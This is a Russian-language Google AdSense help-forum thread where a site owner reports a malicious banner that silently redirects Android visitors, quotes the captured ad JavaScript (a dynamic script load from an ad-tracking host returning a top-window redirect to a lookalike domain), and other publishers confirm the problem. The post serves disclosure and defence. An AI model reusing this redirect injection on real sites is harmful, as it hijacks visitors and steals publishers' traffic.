21.12.2014
Автор первой записи
Maxim ChirkovВредоносные рекламные блоки в AdSense
Добрый день !
Сегодня столкнулся на своём сайте с волной жалоб об автоматическом пробросе на внешний сайт без явного клика на баннер. Проблема проявляется только в браузерах для платформы Android. В ходе разбора выяснилось, что один и рекламных блоков меняет location.href и перебрасывает на левую страницу.
Поймать этот вредоносный баннер можно на http://www.opennet.ru/test/1.html (там только код AdSense) Если почистить Cookie и поставить в User Agent идентификатор Chrome для Android, то через несколько перезагрузок страницы переброс ловится.
Переброс осуществляется на http://www.opennet.ru.tinymp.com/uc.php затем на
Свойственные для проблемного баннера обращения к AdSense:
http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2075278885744463&output=html&h=90&slotname=4566802230&adk=1478762637&w=728&lmt=1419108108&flash=0&url=http%3A%2F%2Fwww.opennet.ru%2Ftest%2F1.html&dt=1419108108910&bdt=237&shv=r20141209&cbv=r20141212&saldr=sb&correlator=8570335602463&frm=20&ga_vid=1479378496.1419108112&ga_sid=1419108112&ga_hid=972738505&ga_fc=0&u_tz=300&u_his=3&u_java=1&u_h=900&u_w=1440&u_ah=850&u_aw=1440&u_cd=24&u_nplug=6&u_nmime=73&dff=serif&dfs=16&adx=720&ady=30&biw=1440&bih=454&eid=317150304&oid=3&rx=0&eae=0&fc=8&brdim=%2C%2C0%2C25%2C1440%2C25%2C1440%2C826%2C1440%2C454&vis=1&abl=XS&ppjl=u&fu=0&bc=1&ifi=1&xpc=31n2UrKVDS&p=http%3A//www.opennet.ru&dtd=3013
http://adx.stcounter.com/adx.js?kcid=51435b3f35749150bf000801&cid=%%CAMPAIGN_ID%%&size=728x90&tw=%%TARGET_WINDOW%%&clt=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCoo2lEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yugBiE%26num%3D1%26sig%3DAOD64_0Z4Kf-FA3h0PmInn27loC2ltc3qw%26client%3Dca-pub-2075278885744463%26adurl%3D&atf=%%ATF%%&fq=%20%20%20%20%20-1&url=&cb=1962283525
http://googleads.g.doubleclick.net/pagead/adview?ai=CzVkCEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yuIBdaX8TuSBQYIAxACGAGgBiE&sigh=ObijYOCrkhE&vis=1
Проблемный JavaScript код, который вызывает переход:
try{function callKonvertaZP(src) {if (typeof(src) == 'undefined') return; var d = document, b=d.body; if(src.toUpperCase().indexOf('HTTP://')==0||src.toUpperCase().indexOf('HTTPS://')==0) try{var img = d.createElement('IMG'); var s = src.replace(/%random%/, Math.round(Math.random()*9999999)); with(img.style){position = 'absolute'; width = '0px'; height = '0px';} img.src = s; b.insertBefore(img, b.firstChild);}catch(e){}}
var konverta_ad_href = '';
try{konverta_ad_href=(window.top || window.self).location.href;konverta_ad_href=encodeURIComponent(konverta_ad_href);}catch(e){}
function trackKonvertaClick() {callKonvertaZP('http://adclick.g.doubleclick.net/aclk?sa=l&ai=Coo2lEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yugBiE&num=1&sig=AOD64_0Z4Kf-FA3h0PmInn27loC2ltc3qw&client=ca-pub-2075278885744463&adurl=');}
(function() {
var wc = document.createElement('script'); wc.type = 'text/javascript'; wc.async = true;
wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozilla%2F5.0+%28Linux%3B+Android+4.4.2%3B+Nexus+4+Build%2FKOT49H%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F34.0.1847.114+Mobile+Safari%2F537.36';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
})();
callKonvertaZP('http://pix.stcounter.com/adx.gif?bid=514b006435749149c2000007&rnd=%random%');}catch(e){}
В частности, кусок
wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozilla%2F5.0+%28Linux%3B+Android+4.4.2%3B+Nexus+4+Build%2FKOT49H%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F34.0.1847.114+Mobile+Safari%2F537.36';
приводит к получению строки
setTimeout("window.top.location.href='http://www.opennet.ru.tinymp.com/uc.php?random=1ee46b4c2993b711f28045af1b2e3edb';", 100);
которая затем выполняется кодом:
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
Полный архив со слепком скриптов в момент появления вредоносного баннера - http://www.opennet.ru/test/1.tgz (проблемный код в 1_files/ads_data/adx.js)
Сегодня столкнулся на своём сайте с волной жалоб об автоматическом пробросе на внешний сайт без явного клика на баннер. Проблема проявляется только в браузерах для платформы Android. В ходе разбора выяснилось, что один и рекламных блоков меняет location.href и перебрасывает на левую страницу.
Поймать этот вредоносный баннер можно на http://www.opennet.ru/test/1.html (там только код AdSense) Если почистить Cookie и поставить в User Agent идентификатор Chrome для Android, то через несколько перезагрузок страницы переброс ловится.
Переброс осуществляется на http://www.opennet.ru.tinymp.com/uc.php затем на
Свойственные для проблемного баннера обращения к AdSense:
http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2075278885744463&output=html&h=90&slotname=4566802230&adk=1478762637&w=728&lmt=1419108108&flash=0&url=http%3A%2F%2Fwww.opennet.ru%2Ftest%2F1.html&dt=1419108108910&bdt=237&shv=r20141209&cbv=r20141212&saldr=sb&correlator=8570335602463&frm=20&ga_vid=1479378496.1419108112&ga_sid=1419108112&ga_hid=972738505&ga_fc=0&u_tz=300&u_his=3&u_java=1&u_h=900&u_w=1440&u_ah=850&u_aw=1440&u_cd=24&u_nplug=6&u_nmime=73&dff=serif&dfs=16&adx=720&ady=30&biw=1440&bih=454&eid=317150304&oid=3&rx=0&eae=0&fc=8&brdim=%2C%2C0%2C25%2C1440%2C25%2C1440%2C826%2C1440%2C454&vis=1&abl=XS&ppjl=u&fu=0&bc=1&ifi=1&xpc=31n2UrKVDS&p=http%3A//www.opennet.ru&dtd=3013
http://adx.stcounter.com/adx.js?kcid=51435b3f35749150bf000801&cid=%%CAMPAIGN_ID%%&size=728x90&tw=%%TARGET_WINDOW%%&clt=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCoo2lEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yugBiE%26num%3D1%26sig%3DAOD64_0Z4Kf-FA3h0PmInn27loC2ltc3qw%26client%3Dca-pub-2075278885744463%26adurl%3D&atf=%%ATF%%&fq=%20%20%20%20%20-1&url=&cb=1962283525
http://googleads.g.doubleclick.net/pagead/adview?ai=CzVkCEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yuIBdaX8TuSBQYIAxACGAGgBiE&sigh=ObijYOCrkhE&vis=1
Проблемный JavaScript код, который вызывает переход:
try{function callKonvertaZP(src) {if (typeof(src) == 'undefined') return; var d = document, b=d.body; if(src.toUpperCase().indexOf('HTTP://')==0||src.toUpperCase().indexOf('HTTPS://')==0) try{var img = d.createElement('IMG'); var s = src.replace(/%random%/, Math.round(Math.random()*9999999)); with(img.style){position = 'absolute'; width = '0px'; height = '0px';} img.src = s; b.insertBefore(img, b.firstChild);}catch(e){}}
var konverta_ad_href = '';
try{konverta_ad_href=(window.top || window.self).location.href;konverta_ad_href=encodeURIComponent(konverta_ad_href);}catch(e){}
function trackKonvertaClick() {callKonvertaZP('http://adclick.g.doubleclick.net/aclk?sa=l&ai=Coo2lEN-VVPj3C8GIZMq_gKACnrylugbm3J-QvwGgq8CpWxABIABghP3xhcgeggEXY2EtcHViLTIwNzUyNzg4ODU3NDQ0NjOgAfqC2OADyAEJqQJWuZpsh25SPqgDAZgEAKoEdk_QKl8hbpVffAgmiS6jzsT3HGHCJJyQjWLskFIyO7or4xTPlEHmv8rxg3dhgiaAdrM3JZ10QK2MskLnKoBbnkK2lVDyaconC7ovmQpPdXsEm84oXuUAX5XmZrQyQNpzIKglfP5EPJeF2zCd0azwfdWJxDpl-yugBiE&num=1&sig=AOD64_0Z4Kf-FA3h0PmInn27loC2ltc3qw&client=ca-pub-2075278885744463&adurl=');}
(function() {
var wc = document.createElement('script'); wc.type = 'text/javascript'; wc.async = true;
wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozilla%2F5.0+%28Linux%3B+Android+4.4.2%3B+Nexus+4+Build%2FKOT49H%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F34.0.1847.114+Mobile+Safari%2F537.36';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
})();
callKonvertaZP('http://pix.stcounter.com/adx.gif?bid=514b006435749149c2000007&rnd=%random%');}catch(e){}
В частности, кусок
wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozilla%2F5.0+%28Linux%3B+Android+4.4.2%3B+Nexus+4+Build%2FKOT49H%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F34.0.1847.114+Mobile+Safari%2F537.36';
приводит к получению строки
setTimeout("window.top.location.href='http://www.opennet.ru.tinymp.com/uc.php?random=1ee46b4c2993b711f28045af1b2e3edb';", 100);
которая затем выполняется кодом:
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
Полный архив со слепком скриптов в момент появления вредоносного баннера - http://www.opennet.ru/test/1.tgz (проблемный код в 1_files/ads_data/adx.js)
Контент в сообществе может быть не проверен или не актуален. Подробнее…
Все ответы (21)
24.12.2014
Автор первой записи
Maxim ChirkovВидео с демонстрацией вредоносных действий: https://www.youtube.com/watch?v=PggsU_KaxvM
11.01.2015
Maxim MalenkinМакс, подтверждаю всю информацию.
сегодня случайно заметил на своем сайте.
Пытаюсь сообщить в гугл, но они не отвечают.
Народ на форумах просто не понимает масштабов аферы.
Люди: ваш трафик уводится через редирект на другой сайт.
Посреднком выступает google Adwords, который молчит с 21-го декабря. а на дворе уже 11 января.
сегодня случайно заметил на своем сайте.
Пытаюсь сообщить в гугл, но они не отвечают.
Народ на форумах просто не понимает масштабов аферы.
Люди: ваш трафик уводится через редирект на другой сайт.
Посреднком выступает google Adwords, который молчит с 21-го декабря. а на дворе уже 11 января.
11.01.2015
Vadimинформацию передал
Но, тут на форуме был случай, пользователь тоже обнаружил редиректы
Позже оказалось проблема была в его роутере, для которого он скачал какую то левую прошивку "ускоряющую интернет"
Именно по этому так долго идут проверки всех таких сообщений
11.01.2015
Автор первой записи
Maxim ChirkovПонятно, что на вредоносное ПО в первую очередь подумают. Поэтому я специально сразу проверил как на другом компьютере (проблема проявлялась через пару перезагрузок страниц у многих посетителей на любом Android-смартфоне), так и на другом сервере (специально создал поддомен и разместил код на абсолютно не коррелирующем со мной другом сервере).
Но и без этого было сразу понятно, что проблема не во вредоносном ПО, так как по коду видно, что это HTML5-баннер подставляет редирект (при вставках вредоносным ПО совсем другие особенности, как правило, в начало или конец добавляется явно выделяющийся кусок javascript, обычно запутанный).
Кстати, 25 декабря тот вредоносный баннер исчез. Для большей надёжности отключил в настройках AdSense динамические баннеры. С тех пор жалоб от пользователей пока не поступало.
Но я лично на этой неделе видел похожие мошеннические баннеры на сайте thevarguy.com - выводится окно, которое маскируется под диалог о необходимости принять условия обеспечения приватности, но на деле кидает куда-то во вне. Особо с этим случаем не разбирался, на thecarguy полно каких-то левых блоков, лишь бегло заметил, что в том всплывшем диалоге в ссылке был googleadservices.com.
Но и без этого было сразу понятно, что проблема не во вредоносном ПО, так как по коду видно, что это HTML5-баннер подставляет редирект (при вставках вредоносным ПО совсем другие особенности, как правило, в начало или конец добавляется явно выделяющийся кусок javascript, обычно запутанный).
Кстати, 25 декабря тот вредоносный баннер исчез. Для большей надёжности отключил в настройках AdSense динамические баннеры. С тех пор жалоб от пользователей пока не поступало.
Но я лично на этой неделе видел похожие мошеннические баннеры на сайте thevarguy.com - выводится окно, которое маскируется под диалог о необходимости принять условия обеспечения приватности, но на деле кидает куда-то во вне. Особо с этим случаем не разбирался, на thecarguy полно каких-то левых блоков, лишь бегло заметил, что в том всплывшем диалоге в ссылке был googleadservices.com.
11.01.2015
Maxim MalenkinЗараза раздается с этого домена:
wc.src = 'https://pix.stcounter.com
Попробую дать конкретику:
1. Гугл включил в показы "левого" рекламодателя, возможно это его дочерняя контора.
2. трафик с сайтов воруется посредстовм и перенаправляется на партнерские программы в зависимости от условий: мобильный оператор, ОСь.
wc.src = 'https://pix.stcounter.com
Попробую дать конкретику:
1. Гугл включил в показы "левого" рекламодателя, возможно это его дочерняя контора.
2. трафик с сайтов воруется посредстовм и перенаправляется на партнерские программы в зависимости от условий: мобильный оператор, ОСь.
3. Владелец сайта ничего не получает от adsense, просто теряет посетителей в том числе постоянных.
4. К сайту могут быть применены фильры поисковых систем за нарушение правил работы с ними: клоакинг, редирект.
5. Достоверно известно, что ситуация продолжается с 18-го декабря и что с 21 декабря о ней было заявлено в Гугл.
5. Достоверно известно, что ситуация продолжается с 18-го декабря и что с 21 декабря о ней было заявлено в Гугл.
11.01.2015
MrEvgeniy770Подтверждаю информацию
В целях избежания воровства моего траффика был вынужден переключиться на только текстовые объявления
В целях избежания воровства моего траффика был вынужден переключиться на только текстовые объявления
11.01.2015
a777Подтверждаю, все объявления перевел в текстовые
11.01.2015
iqmakerПодтверждаю речь не идет ни о каких вирусах, проблема именно в рекламном блоке гугла, это носит массовый характер и почему гугл спит не ясно. Возможно какие-то единичные обращения и можно рассматривать как угодно долго, но на подобного рода баги надо реагировать мгновенно. И да, вы сами можете проверить что все вышесказанное ТС, работает.
11.01.2015
алексей алексДа этой проблеме сто лет, из-за это в сентябре яндекс наложил санкции на многие сайты. Потом снял. Но эта проблема не только адсенса но и рся.
11.01.2015
evgeny.vПодтверждаю! Злоумышленники научились внедрять зловредный код в объявления.. Мдаа, уж ... ну и позорище, как же вы там свои продукты тестируете.
ЕЩЁ 10
03.02.2016
kenlanУ меня тоже такая же проблема началась.
Эти ответы были полезны?
Помогите нам улучшить их.
Вопрос заблокирован. Ответить на него невозможно. Остались вопросы? Обратитесь на справочный форум.
Значки
Некоторые участники могут получать значки, которые отражают, в каком качестве и насколько активно они вносят вклад в работу сообщества.
Контент в сообществе может быть не проверен или не актуален. Подробнее…
Уровни
Уровень участника отражает его активность на форумах: чем активнее пользователь, тем выше его уровень. Каждый участник изначально находится на уровне 1 и может подняться до уровня 10. Вот какие достижения помогают увеличивать уровень:
- вы ответили на вопрос;
- ваш ответ признан лучшим;
- пользователь отметил, что ему помогло ваше сообщение;
- вы оценили сообщение другого участника как полезное или бесполезное;
- вы обоснованно пожаловались на тему или сообщение.
Если ваше сообщение было удалено в связи с жалобами других пользователей, ваш уровень будет повышаться медленнее.
Вы хотите просмотреть профиль участника?
Это страница справки. Просматривать профили участников форума на ней нельзя.
Вы хотите пожаловаться на комментарий?
Этот комментарий размещен на форуме по продукту Google. А это страница справки, здесь нельзя подать жалобу.
Вы хотите ответить на комментарий?
Этот комментарий размещен на форуме по продукту Google. А это страница справки, здесь нельзя переписываться с пользователями.